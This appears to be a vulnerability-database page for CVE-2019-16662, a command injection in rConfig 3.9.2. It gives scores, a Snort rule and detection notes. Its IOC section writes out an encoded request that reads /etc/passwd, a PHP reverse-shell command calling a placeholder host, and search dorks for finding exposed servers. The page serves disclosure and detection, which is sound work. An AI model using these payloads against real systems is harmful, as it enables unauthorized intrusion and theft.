cbcvebase.
CVE-2019-16662
published 2019-10-28

CVE-2019-16662: An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
97.70%
99.9th percentile
An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

Affected

1 ranges
VendorProductVersion rangeFixed in
rconfigrconfig

Detection & IOCsextracted from sources · hover to see the quote

path/install/lib/ajaxHandlers/ajaxServerSettingsChk.php
url/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
command;php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'#
path/install/
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible rConfig 3.9.2 Remote Code Execution PoC M1 (CVE-2019-16662)"; flow:established,to_server; http.uri.raw; content:"/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b"; nocase; fast_pattern; reference:url,packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html; reference:cve,2019-16662; classtype:attempted-admin; sid:2028933; rev:4; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2019_11_04, cve CVE_2019_16662, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect GET requests to /install/lib/ajaxHandlers/ajaxServerSettingsChk.php with a URL-encoded semicolon (%3b) in the rootUname parameter, indicating command injection attempt.
  • The presence of the /install/ directory on a production rConfig instance is a prerequisite for exploitation; its existence should be treated as a misconfiguration indicator and monitored for access.
  • Successful exploitation response body will contain /etc/passwd content matching 'root:.*:0:0:'; monitor HTTP responses from ajaxServerSettingsChk.php for this pattern.
  • The exploit checks for HTTP 200 on the /install path before proceeding; a 404 indicates the install directory has been removed and the target is not vulnerable.
  • Use Shodan/FOFA/Google dorks to identify exposed rConfig instances: shodan-query 'http.title:"rconfig"', fofa-query 'title="rconfig"', google-query 'intitle:"rconfig"'.
  • ·The vulnerability is unauthenticated and exploitable only when the /install/ directory remains present post-installation. Removing this directory eliminates the attack surface.
  • ·The Metasploit module defaults to SSL (RPORT 443); detection rules should cover both HTTP (80) and HTTPS (443) traffic.
  • ·The Metasploit module bad characters for payload are null byte, newline, carriage return, and ampersand; payloads delivered via rootUname will avoid these characters.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.